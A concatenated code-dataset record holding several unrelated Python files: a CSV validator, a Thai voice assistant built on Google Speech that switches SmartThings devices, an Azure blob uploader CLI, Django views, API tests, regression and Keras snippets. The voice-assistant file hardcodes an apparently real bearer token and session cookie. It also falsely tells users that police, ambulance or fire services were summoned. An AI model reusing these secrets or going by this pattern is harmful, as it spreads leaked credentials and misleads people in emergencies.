get_schema_validator()\n\n\n# Check for any schema validation errors\n# note the schema is first pass only at present\ndef validate(json_row):\n logging.debug('Entering validate(json_row)')\n validation_errors = validator.iter_errors(json_row)\n valid = 1\n for schema_error in validation_errors:\n # We could log some output here but it could get too verbose\n valid = 0\n return valid\n\n\n# The core processing sequence for a row of CSV style data\ndef process(row):\n logging.debug('Entering process(row)')\n json_row = map(row) # Refactor: Schema driven mapping\n valid = validate(json_row)\n # We're going to do some downstream checks and filters based upon this\n json_row['valid'] = valid\n return json_row\n\n\ndef write(json_row, out_file):\n logging.debug('Entering write(json_row, out_file)')\n out_writer = csv.DictWriter(out_file, json_row.keys())\n out_writer.writerow(json_row)\n\n\n# Entry point. Takes an input CSV file and generates a validated\n# CSV output file with lineage metadata\n# Note a JSON output would be better, but the dowstream postgres\n# load step is tied to CSV\n# Other target backends would be better with JSON records.\n# Most bulk inserts require a proprietrary format however.\ndef processFile(in_file_name, out_file_name):\n logging.info('Entering processFile')\n load_timestamp = datetime.datetime.now()\n\n with io.open(in_file_name, 'r', encoding='utf8') as in_file:\n with io.open(out_file_name, 'w', encoding='utf8') as out_file:\n csv_reader = csv.reader(in_file, delimiter=',')\n next(csv_reader, None) # throw away the header\n line_no = 0\n for row in csv_reader:\n line_no += 1\n processed_row = process(row)\n # Include some lineage metadata\n processed_row['line_no'] = line_no\n processed_row['load_timestamp'] = load_timestamp\n write(processed_row, out_file)\n\n\nif __name__ == '__main__':\n processFile(sys.argv[1], sys.argv[2])\n","sub_path":"src/pre_process.py","file_name":"pre_process.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"531581118","text":"#!/usr/bin/python\n# -- coding: utf-8 --\n\n# Copyright (C) 2016 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Sample that streams audio to the Google Cloud Speech API via GRPC.\"\"\"\n\nfrom __future__ import division\n\nimport contextlib\nimport functools\nimport re\nimport signal\nimport sys\n\n\nimport google.auth\nimport google.auth.transport.grpc\nimport google.auth.transport.requests\nfrom google.cloud.proto.speech.v1beta1 import cloud_speech_pb2\nfrom google.rpc import code_pb2\nimport grpc\nimport pyaudio\nfrom six.moves import queue\n\nimport requests\nimport json\nimport time\n\nimport logging\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nimport os.path\nimport uuid\n\nfrom tornado.options import define, options\n\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/\", MainHandler),\n (r\"/chatsocket\", ChatSocketHandler),\n ]\n settings = dict(\n cookie_secret=\"__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookies=True,\n )\n super(Application, self).__init__(handlers, **settings)\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index.html\", messages=ChatSocketHandler.cache)\n\nclass ChatSocketHandler(tornado.websocket.WebSocketHandler):\n waiters = set()\n cache = []\n cache_size = 200\n\n def get_compression_options(self):\n # Non-None enables compression with default options.\n return {}\n\n def open(self):\n ChatSocketHandler.waiters.add(self)\n\n def on_close(self):\n ChatSocketHandler.waiters.remove(self)\n\n @classmethod\n def update_cache(cls, chat):\n cls.cache.append(chat)\n if len(cls.cache) > cls.cache_size:\n cls.cache = cls.cache[-cls.cache_size:]\n\n @classmethod\n def send_updates(cls, chat):\n print(\"sending updates\")\n logging.info(\"sending message to %d waiters\", len(cls.waiters))\n for waiter in cls.waiters:\n try:\n waiter.write_message(chat)\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n def on_message(self, message):\n logging.info(\"got message %r\", message)\n parsed = tornado.escape.json_decode(message)\n chat = {\n \"id\": str(uuid.uuid4()),\n \"body\": parsed[\"body\"],\n }\n chat[\"html\"] = tornado.escape.to_basestring(\n self.render_string(\"message.html\", message=chat))\n\n ChatSocketHandler.update_cache(chat)\n ChatSocketHandler.send_updates(chat)\n\n# Audio recording parameters\nRATE = 16000\nCHUNK = int(RATE / 10) # 100ms\n\n# The Speech API has a streaming limit of 60 seconds of audio*, so keep the\n# connection alive for that long, plus some more to give the API time to figure\n# out the transcription.\n# * https://g.co/cloud/speech/limits#content\nDEADLINE_SECS = 60 * 3 + 5\nSPEECH_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'\n\ndef make_channel(host, port):\n \"\"\"Creates a secure channel with auth credentials from the environment.\"\"\"\n # Grab application default credentials from the environment\n credentials, _ = google.auth.default(scopes=[SPEECH_SCOPE])\n\n # Create a secure channel using the credentials.\n http_request = google.auth.transport.requests.Request()\n target = '{}:{}'.format(host, port)\n\n return google.auth.transport.grpc.secure_authorized_channel(\n credentials, http_request, target)\n\ndef _audio_data_generator(buff):\n \"\"\"A generator that yields all available data in the given buffer.\n\n Args:\n buff - a Queue object, where each element is a chunk of data.\n Yields:\n A chunk of data that is the aggregate of all chunks of data in `buff`.\n The function will block until at least one data chunk is available.\n \"\"\"\n stop = False\n while not stop:\n # Use a blocking get() to ensure there's at least one chunk of data.\n data = [buff.get()]\n\n # Now consume whatever other data's still buffered.\n while True:\n try:\n data.append(buff.get(block=False))\n except queue.Empty:\n break\n\n # `None` in the buffer signals that the audio stream is closed. Yield\n # the final bit of the buffer and exit the loop.\n if None in data:\n stop = True\n data.remove(None)\n\n yield b''.join(data)\n\ndef _fill_buffer(buff, in_data, frame_count, time_info, status_flags):\n \"\"\"Continuously collect data from the audio stream, into the buffer.\"\"\"\n buff.put(in_data)\n return None, pyaudio.paContinue\n\n# [START audio_stream]\n@contextlib.contextmanager\ndef record_audio(rate, chunk):\n \"\"\"Opens a recording stream in a context manager.\"\"\"\n # Create a thread-safe buffer of audio data\n buff = queue.Queue()\n\n audio_interface = pyaudio.PyAudio()\n audio_stream = audio_interface.open(\n format=pyaudio.paInt16,\n # The API currently only supports 1-channel (mono) audio\n # https://goo.gl/z757pE\n channels=1, rate=rate,\n input=True, frames_per_buffer=chunk,\n # Run the audio stream asynchronously to fill the buffer object.\n # This is necessary so that the input device's buffer doesn't overflow\n # while the calling thread makes network requests, etc.\n stream_callback=functools.partial(_fill_buffer, buff),\n )\n\n yield _audio_data_generator(buff)\n\n audio_stream.stop_stream()\n audio_stream.close()\n # Signal the _audio_data_generator to finish\n buff.put(None)\n audio_interface.terminate()\n# [END audio_stream]\n\ndef request_stream(data_stream, rate, interim_results=True):\n \"\"\"Yields `StreamingRecognizeRequest`s constructed from a recording audio\n stream.\n\n Args:\n data_stream: A generator that yields raw audio data to send.\n rate: The sampling rate in hertz.\n interim_results: Whether to return intermediate results, before the\n transcription is finalized.\n \"\"\"\n # The initial request must contain metadata about the stream, so the\n # server knows how to interpret it.\n recognition_config = cloud_speech_pb2.RecognitionConfig(\n # There are a bunch of config options you can specify. See\n # https://goo.gl/KPZn97 for the full list.\n encoding='LINEAR16', # raw 16-bit signed LE samples\n sample_rate=rate, # the rate in hertz\n # See http://g.co/cloud/speech/docs/languages\n # for a list of supported languages.\n language_code='th-TH', # a BCP-47 language tag\n # language_code='en-EN', # a BCP-47 language tag\n )\n streaming_config = cloud_speech_pb2.StreamingRecognitionConfig(\n interim_results=interim_results,\n config=recognition_config,\n )\n\n yield cloud_speech_pb2.StreamingRecognizeRequest(\n streaming_config=streaming_config)\n\n for data in data_stream:\n # Subsequent requests can all just have the content\n yield cloud_speech_pb2.StreamingRecognizeRequest(audio_content=data)\n\ndef listen_print_loop(recognize_stream):\n \"\"\"Iterates through server responses and prints them.\n\n The recognize_stream passed is a generator that will block until a response\n is provided by the server. When the transcription response comes, print it.\n\n In this case, responses are provided for interim results as well. If the\n response is an interim one, print a line feed at the end of it, to allow\n the next result to overwrite it, until the response is a final one. For the\n final one, print a newline to preserve the finalized transcription.\n \"\"\"\n num_chars_printed = 0\n try:\n for resp in recognize_stream:\n if resp.error.code != code_pb2.OK:\n raise RuntimeError('Server error: ' + resp.error.message)\n\n if not resp.results:\n continue\n\n # Display the top transcription\n result = resp.results[0]\n transcript = result.alternatives[0].transcript\n\n # Display interim results, but with a carriage return at the end of the\n # line, so subsequent lines will overwrite them.\n #\n # If the previous result was longer than this one, we need to print\n # some extra spaces to overwrite the previous result\n overwrite_chars = ' ' * max(0, num_chars_printed - len(transcript))\n if not result.is_final:\n sys.stdout.write(transcript + overwrite_chars + '\\r')\n sys.stdout.flush()\n\n num_chars_printed = len(transcript)\n print(transcript)\n else:\n print(transcript + overwrite_chars)\n\n # Exit recognition if any of the transcribed phrases could be\n # one of our keywords.\n if re.search(r'\\b(exit|quit)\\b', transcript, re.I):\n print('Exiting..')\n break\n elif re.search(r'\\b(ออก)\\b', transcript, re.I):\n print('Exiting..')\n break\n # elif transcript == u'ออโต้ เปิดไฟ ' or transcript == u'เอาโต เปิดไฟ ' or transcript == u'oppo เปิดไฟ ' \\\n # or transcript == u'auto เปิดไฟ ' or transcript == u' auto เปิดไฟ ' or transcript == u' oppo เปิดไฟ ':\n # print('turning on light')\n # elif transcript == u'ออโต้ ช่วยด้วย ' or transcript == u'เอาโต ช่วยด้วย ' or transcript == u'oppo ช่วยด้วย ' \\\n # or transcript == u'auto ช่วยด้วย ' or transcript == u' auto ช่วยด้วย ' or transcript == u'เอาตัวช่วยด้วย ' \\\n # or transcript == u'auto ชื่อด้วย ' or transcript == u'auto ชื่อด้วย ' or transcript == u' oppo ช่วยด้วย ':\n # print(u'พร้อมมาช่วยแล้วครับ')\n # elif transcript == u'ออโต้ เรียกตำรวจ ' or transcript == u'เอาโต เรียกตำรวจ ' or transcript == u'oppo เรียกตำรวจ ' \\\n # or transcript == u'auto เรียกตำรวจ ' or transcript == u' auto เรียกตำรวจ ' or transcript == u'เอาตัวเรียกตำรวจ ' \\\n # or transcript == u'auto เรียนตำรวจ ' or transcript == u'auto ตำรวจ ' or transcript == u'ขอโทษตำรวจ ' \\\n # or transcript == u'เอาตูดตำรวจ ' or transcript == u' auto ตำรวจ ' or transcript == u'auto ตำรวจ ':\n # print(u'ตำรวจอยู่ระหว่างทางกำลังมา')\n # elif transcript == u'ออโต้ โรงพยาบาล ' or transcript == u'อัลโตโรงพยาบาล ' or transcript == u'oppo โรงพยาบาล ' \\\n # or transcript == u'auto โรงพยาบาล ' or transcript == u' auto โรงพยาบาล ' or transcript == u'เอาตัวโรงพยาบาล ' \\\n # or transcript == u'เอาตูดโรงพยาบาล ' or transcript == u'also โรงพยาบาล ':\n # print(u'โรงพยาบาลกำลังมาช่วยเหลือครับ ')\n # elif transcript == u'ออโต้ เปิดแอร์ ' or transcript == u'เอาโต เปิดแอร์ ' or transcript == u'oppo เปิดแอร์ ' \\\n # or transcript == u'auto เปิดแอร์ ' or transcript == u' auto เปิดแอร์ ' or transcript == u'อัลโต้เปิดแอร์ ':\n # print('turning on AC')\n # elif transcript == u'ออโต้ ไฟใหม้ ' or transcript == u'เอาโต ไฟไหม้ ' or transcript == u'oppo ไฟไหม้' \\\n # or transcript == u'auto ไฟไหม้ ' or transcript == u' auto ไฟไหม้ ' or transcript == u'รถตู้ไฟไหม้ '\\\n # or transcript == u'oppo find ��ม่ ' or transcript == u'เอาตู้ไฟไหม้ ':\n # print('ตำรวจดับเพลิงกำลังมาครับ')\n # elif transcript == u'ออโต้ เปิดทีวี ' or transcript == u'เอาโต เปิดทีวี ' or transcript == u'oppo เปิดทีวี ' \\\n # or transcript == u'auto เปิดทีวี ' or transcript == u' auto เปิดทีวี ':\n # print('turning on TV')\n\n elif u'เปิดไฟ' in transcript:\n turn_on_light()\n print('turning on light')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการเปิดไฟให้แล้วค่ะ ')\n elif u'ปิดไฟ' in transcript:\n turn_off_light()\n print('turning off light')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการปิดไฟให้แล้วค่ะ ')\n elif u'ช่วยด้วย' in transcript:\n print(u'พร้อมมาช่วยแล้วครับ')\n text_to_speech(u'อัลโต้ได้ส่งข้อความและโทรเรียกคนในบ้านให้แล้วค่ะ ')\n elif u'เรียกตำรวจ' in transcript or u'ตำรวจ' in transcript:\n print(u'ตำรวจอยู่ระหว่างทางกำลังมา')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้เรียกตำรวจให้แล้วนะค่ะ อยู่ระหว่างทางค่ะ ')\n elif u'โรงพยาบาล' in transcript:\n print(u'โรงพยาบาลกำลังมาช่วยเหลือครับ')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้เรียกรถพยาบาลให้แล้วนะค่ะ อยู่ระหว่างทางค่ะ ')\n elif u'เปิดแอร์' in transcript:\n turn_on_ac()\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการเปิดแอร์ให้แล้วค่ะ รอสักพักนะค่ะ ')\n print('turning on AC')\n elif u'ปิดแอร์' in transcript:\n turn_off_ac()\n print('turning off AC')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการปิดแอร์ให้แล้วค่ะ สบายใจได้หายห่วง ')\n elif u'ไฟไหม้' in transcript:\n print('ตำรวจดับเพลิงกำลังมาครับ')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้เรียกรถดับเพลิงให้อย่างเร่งด่วนแล้วค่ะ รอสักแป๊ปนะค่ะ ')\n elif u'เปิดทีวี' in transcript:\n turn_on_tv()\n print('turning on TV')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการเปิดทีวีให้แล้วค่ะ คอยติดตามชมนะค่ะ ')\n elif u'ปิดทีวี' in transcript:\n turn_off_tv()\n print('turning off TV')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการปิดทีวีให้แล้วค่ะ คอยติดตามชมนะค่ะ ')\n elif u'ออก' in transcript:\n print('Exiting..')\n break\n else:\n print(\"text not matched transcript\")\n print(transcript)\n\n num_chars_printed = 0\n except:\n print(\"error in listen_print_loop\")\n\ndef turn_on_ac():\n # My API\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/9b86fd56-4de8-4b1d-b2de-98c3f5243e27\n print(\"sending turning on AC command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/9b86fd56-4de8-4b1d-b2de-98c3f5243e27\",\n headers={\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"on\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_off_ac():\n # My API\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/9b86fd56-4de8-4b1d-b2de-98c3f5243e27\n print(\"sending turning off AC command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/9b86fd56-4de8-4b1d-b2de-98c3f5243e27\",\n headers={\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"off\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_on_light():\n # front lifx\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/08e75403-af24-4dcf-b1d6-ce253008858a\n print(\"sending turning on Light command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/08e75403-af24-4dcf-b1d6-ce253008858a\",\n headers={\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"on\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_off_light():\n # front lifx\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/08e75403-af24-4dcf-b1d6-ce253008858a\n print(\"sending turning off Light command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/08e75403-af24-4dcf-b1d6-ce253008858a\",\n headers={\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"off\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_on_tv():\n # TV\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/b64f5e3a-d447-48f8-8d86-050de41cec7a\n print(\"sending turning on TV command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/b64f5e3a-d447-48f8-8d86-050de41cec7a\",\n headers={\n \"Cookie\": \"JSESSIONID=FCCFD41E2393191D2AA158F251B09CDF-n2\",\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"on\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_off_tv():\n # TV\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/b64f5e3a-d447-48f8-8d86-050de41cec7a\n print(\"sending turning off TV command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/b64f5e3a-d447-48f8-8d86-050de41cec7a\",\n headers={\n \"Cookie\": \"JSESSIONID=FCCFD41E2393191D2AA158F251B09CDF-n2\",\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"off\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef text_to_speech(msg):\n # Request (4)\n # POST http://localhost:8888/test\n\n try:\n response = requests.get(\n url=\"http://localhost:8080/websocket\",\n # headers={\n # \"Cookie\": \"_xsrf=2|944ae2e2|73e716843e1dd25abd7365e04aec06e7|1490541278\",\n # \"Content-Type\": \"application/x-www-form-urlencoded; charset=utf-8\",\n # },\n # data={\n # \"message\": msg,\n # },\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef main():\n service = cloud_speech_pb2.SpeechStub(\n make_channel('speech.googleapis.com', 443))\n\n # For streaming audio from the microphone, there are three threads.\n # First, a thread that collects audio data as it comes in\n with record_audio(RATE, CHUNK) as buffered_audio_data:\n # Second, a thread that sends requests with that data\n requests = request_stream(buffered_audio_data, RATE)\n # Third, a thread that listens for transcription responses\n recognize_stream = service.StreamingRecognize(\n requests, DEADLINE_SECS)\n\n # Exit things cleanly on interrupt\n signal.signal(signal.SIGINT, lambda *_: recognize_stream.cancel())\n\n # Now, put the transcription responses to use.\n try:\n listen_print_loop(recognize_stream)\n recognize_stream.cancel()\n except grpc.RpcError as e:\n code = e.code()\n # CANCELLED is caused by the interrupt handler, which is expected.\n if code is not code.CANCELLED:\n raise\n\n # tornado.options.parse_command_line()\n # app = Application()\n # app.listen(options.port)\n # tornado.ioloop.IOLoop.current().start()\n\nif __name__ == '__main__':\n main()\n","sub_path":"speech/grpc/transcribe_streaming.py","file_name":"transcribe_streaming.py","file_ext":"py","file_size_in_byte":26098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517882255","text":"\"\"\"\n * PyAzBlob 1.0.0 Python Azure Blob Service Bulk Uploader\n * https://github.com/RobertoPrevato/PyAzBlob\n *\n * Copyright 2017, Roberto Prevato\n * https://robertoprevato.github.io\n *\n * Licensed under the MIT license:\n * http://www.opensource.org/licenses/MIT\n\"\"\"\nimport sys\nis_less_than_34 = sys.version_info <= (3, 4)\n\nseparator = \"===========================================================\\n\"\n\nbanner = \"\"\"\n===========================================================\n _____ ____ _ _ \n | __ \\ /\\ | _ \\| | | | \n | |__) | _ / \\ ___| |_) | | ___ | |__ \n | ___/ | | | / /\\ \\ |_ / _ <| |/ _ \\| '_ \\ \n | | | |_| |/ ____ \\ / /| |_) | | (_) | |_) | \n |_| \\__, /_/ \\_\\/___|____/|_|\\___/|_.__/ \n __/ | \n |___/ \n \n PyAzBlob | Azure Blob Service Bulk Uploader. \n Written by Roberto Prevato \n \n===========================================================\"\"\"\n\n\ndef sep_print(message):\n print(\"[*]\")\n print(\"[*] \" + message)\n print(\"[*]\")\n\nif is_less_than_34:\n print(banner)\n sep_print(\"PyAzBlob requires Python 3.4 or greater\")\n sys.exit(1)\n\nimport argparse\nfrom core.exceptions import ArgumentNullException, InvalidArgument, MissingDependency, ConfigurationError\n\n\nparser = argparse.ArgumentParser(description=\"PyAzBlob | Azure Blob Service Bulk Uploader\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"{}\\n{}\".format(\"author: Roberto Prevato roberto.prevato@gmail.com\", separator))\n\nparser.add_argument(\"-p\", \"--path\", dest=\"root_path\", required=True,\n help=\"path from which to start uploading files\")\n\nparser.add_argument(\"-c\", \"--cut\", dest=\"cut_path\", required=False,\n help=\"portion of root path to cut from uploaded blobs\")\n\nparser.add_argument(\"-i\", \"--ignore\", dest=\"ignoredpath\", required=False, nargs=\"+\",\n help=\"ignored paths (Unix style, globs)\", default=[])\n\nparser.add_argument(\"-r\", \"--recurse\", dest=\"recurse\", required=False, action=\"store_true\", default=False,\n help=\"whether to do recursive upload of subfolders and files.\")\n\nparser.add_argument(\"-f\", \"--force\", dest=\"force\", required=False, action=\"store_true\", default=False,\n help=\"whether to force re-upload of files that were uploaded in a previous run (from files.log).\")\n\nparser.add_argument(\"-s\", \"--sleep\", dest=\"sleep\", required=False, default=-1,\n help=\"sleep time in milliseconds, between uploads (default no sleep)\")\n\nparser.add_argument(\"--nobanner\", dest=\"nobanner\", required=False, action=\"store_true\", default=False,\n help=\"whether to disable the banner with ascii art.\")\n\noptions = parser.parse_args()\n\n\nif __name__ == \"__main__\":\n if not options.nobanner:\n print(banner)\n try:\n from core.pyazblobcore import pyazupload_entry\n\n pyazupload_entry(options.root_path,\n options.cut_path,\n options.ignoredpath,\n options.recurse,\n options.force,\n options.sleep)\n\n except MissingDependency as mde:\n sep_print(str(mde))\n sys.exit(1)\n\n except ConfigurationError as ce:\n sep_print(\"Configuration Error: \" + str(ce))\n sys.exit(1)\n\n except (ArgumentNullException, InvalidArgument) as handled_exception:\n sep_print(\"Error: \" + str(handled_exception))\n\n except RuntimeError as re:\n sep_print(\"Runtime Error: \" + str(re))\n\n except KeyboardInterrupt:\n sep_print(\"User interrupted...\")\n","sub_path":"pyazblob.py","file_name":"pyazblob.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"2814326","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import *\n\ndef index(request):\n context = {\n 'courses': Course.objects.all()\n }\n return render(request, 'index.html', context)\n\ndef create_course(request):\n errors = Course.objects.course_validate(request.POST)\n if errors:\n for key, value in errors.items():\n messages.error(request, value)\n else:\n course = Course.objects.create(\n name = request.POST['name']\n )\n desc = Description.objects.create(desc_content=request.POST['desc_content'])\n course.description = desc\n course.save()\n\n return redirect('/')\n\ndef comments_page(request, id):\n context = {\n 'course': Course.objects.get(id=id)\n }\n return render(request, 'comments.html', context)\n\ndef create_comment(request, id):\n errors = Comment.objects.comment_validate(request.POST)\n if errors:\n for key, value in errors.items():\n messages.error(request, value)\n else:\n Comment.objects.create(\n comm_content = request.POST['comm_content'],\n course = Course.objects.get(id=id)\n )\n return redirect(f'/comments/{id}')\n\ndef delete_alert(request, id):\n course = Course.objects.get(id=id)\n context = {\n 'course': course\n }\n return render(request, 'delete_alert.html', context)\n\ndef delete_course(request, id):\n course = Course.objects.get(id=id)\n course.delete()\n return redirect('/')","sub_path":"courses/app_one/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"57769298","text":"\"\"\"\nThis module contains tests for \nGET /server/\n\n- Test empty\n- Test few\n- Test no auth\n\"\"\"\n\nfrom pydantic.schema import schema\nfrom tests import Session, TestClient, User\nfrom app import crud, schemas, models\nimport uuid\n\n\ndef create_test_server_schema(number: int) -> schemas.ServerCreate:\n return schemas.ServerCreate(\n name=f\"Test server {number}\",\n hostname=f\"127.0.0.{number}\",\n username=\"root\",\n password=\"12345\",\n pool_key=\"0x0\",\n farmer_key=\"0x0\",\n )\n\n\ndef test_empty(db: Session, client: TestClient, user: User) -> None:\n server_num, _ = crud.server.get_multi(db)\n assert server_num == 0\n\n response = client.get(\"/server/\", headers=user.auth_header)\n assert response.status_code == 200, response.content\n\n table = schemas.Table[schemas.ServerReturn](**response.json())\n assert table.amount == 0\n assert table.items == []\n\n\ndef test_few(db: Session, client: TestClient, user: User) -> None:\n id_order: list[uuid.UUID] = []\n for i, server_create in enumerate(create_test_server_schema(j) for j in range(10)):\n last_created_server = crud.server.create(db, obj_in=server_create)\n id_order.append(last_created_server.id)\n response = client.get(\"/server/\", headers=user.auth_header)\n assert response.status_code == 200, response.content\n\n table = schemas.Table[schemas.ServerReturn](**response.json())\n assert table.amount == i + 1\n amount, servers = crud.server.get_multi(db)\n assert amount == i + 1\n for order_id, server_obj, server_return in zip(id_order, servers, table.items):\n assert server_return == schemas.ServerReturn.from_orm(server_obj)\n assert server_obj.id == server_return.id == order_id\n\n\ndef test_no_auth(db: Session, client: TestClient, user: User) -> None:\n response = client.get(\"/server/\")\n assert response.status_code == 401, response.content","sub_path":"tests/server/test_get.py","file_name":"test_get.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542693874","text":"import numpy as np\n\ndef pred(X,param):\n\ttheta = param[0]\n\treturn np.dot(X, theta)\n\ndef error(X,Y,param):\n\ttheta = param[0]\n\tn, m = np.shape(X)\n\t# calculate the predicted outputs\n\tpred = np.dot(X, theta)\n\t# calculate the difference between the output and the prediction\n\tloss = pred - Y\n\t# calculate the quadratic error\n\terror = (np.dot(loss.transpose(),loss))/ (2 * n)\n\treturn error\n\ndef normalEq(X,Y,lambdaa):\n\tmodI=np.eye(X.shape[1])\n\tmodI[0][0]=0\n\treturn [np.dot(np.linalg.pinv(np.dot(X.transpose(),X)+lambdaa*modI),np.dot(X.transpose(),Y))]\n","sub_path":"nEq.py","file_name":"nEq.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"139475739","text":"from __future__ import print_function\nimport keras\nfrom keras.datasets import cifar10\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train /= 255\nx_test /= 255\n\nnum_class = 10\n\ny_train = keras.utils.to_categorical(y_train,num_class)\ny_test = keras.utils.to_categorical(y_test,num_class)\n\nmodel = Sequential()\n\nmodel.add(Conv2D(32, kernel_size=4, activation='elu', input_shape=(32,32,3),padding='same'))\nmodel.add(Conv2D(32, kernel_size=4, activation='elu', padding='same'))\nmodel.add(MaxPooling2D((2,2), padding='same'))\nmodel.add(Dropout(0.2))\n\nmodel.add(Conv2D(64, kernel_size=4, activation='elu', 